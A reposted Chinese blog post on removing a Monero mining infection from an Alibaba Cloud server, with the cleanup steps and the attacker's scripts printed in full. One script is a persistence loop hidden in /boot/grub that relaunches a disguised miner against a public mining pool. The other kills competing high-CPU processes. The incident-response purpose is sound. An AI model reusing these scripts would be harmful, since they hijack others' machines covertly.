• 阿里云服务器出现入侵事件:挖矿进程


    1.查看进程
    # ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'
    找出CPU占有率高的你不认识的进程,我的是这样的

    bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa

    干掉它

    kill -9 11110

    2.全局搜索这个进程
    [root@wangtianze ~]# grep -r pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:cat daemon | grep pool.minexmr.com
    .bash_history:cat deamon | grep pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com
    .bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
    .bash_history:grep -r pool.minexmr.com

    3.打开搜索到的位置
    # vim /boot/grub/deamon

    里面是这样的

    #!/bin/bash
    #daemon
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
    while true;
    do
    server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
    if [ ! "$server" ]; then
    cp -rf /boot/grub/grub.tz /usr/sbin/bashd
    chmod +x /usr/sbin/bashd
    cd /usr/sbin
    nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
    fi
    sleep 15
    done

    删掉里面的while循环,只保留

    #!/bin/bash
    #daemon
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

    全局搜索

    # grep -r pool.minexmr.com

    同样干掉

    #!/bin/bash
    #disk_genius
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
    while true;
    do
    ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}
    sleep 3
    done

    改成

    #!/bin/bash
    #disk_geniusi
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

    再次搜索

    # grep -r pool.minexmr.com


    终于没了

    首先找到是哪里的漏洞,设置特定IP访问
    ---------------------
    作者:Wang_Tian_Ze
    来源:CSDN
    原文:https://blog.csdn.net/qq_16845639/article/details/77650271
    版权声明:本文为博主原创文章,转载请附上博文链接!

  • 相关阅读:
    一个票据打印实例
    页面刷新,保持页面位置
    HTML页面跳转
    DataTable帮助类
    使用cookie保存用户名状态
    DataTable实现数据统计
    Coolite Toolkit学习笔记九:表单布局控件FormLayout与FromPanel
    QQ趣事
    看到几篇关于Ajax介绍的文章,转贴过来
    积极的生活着
  • 原文地址:https://www.cnblogs.com/nul1/p/10942193.html
Copyright © 2020-2023  润新知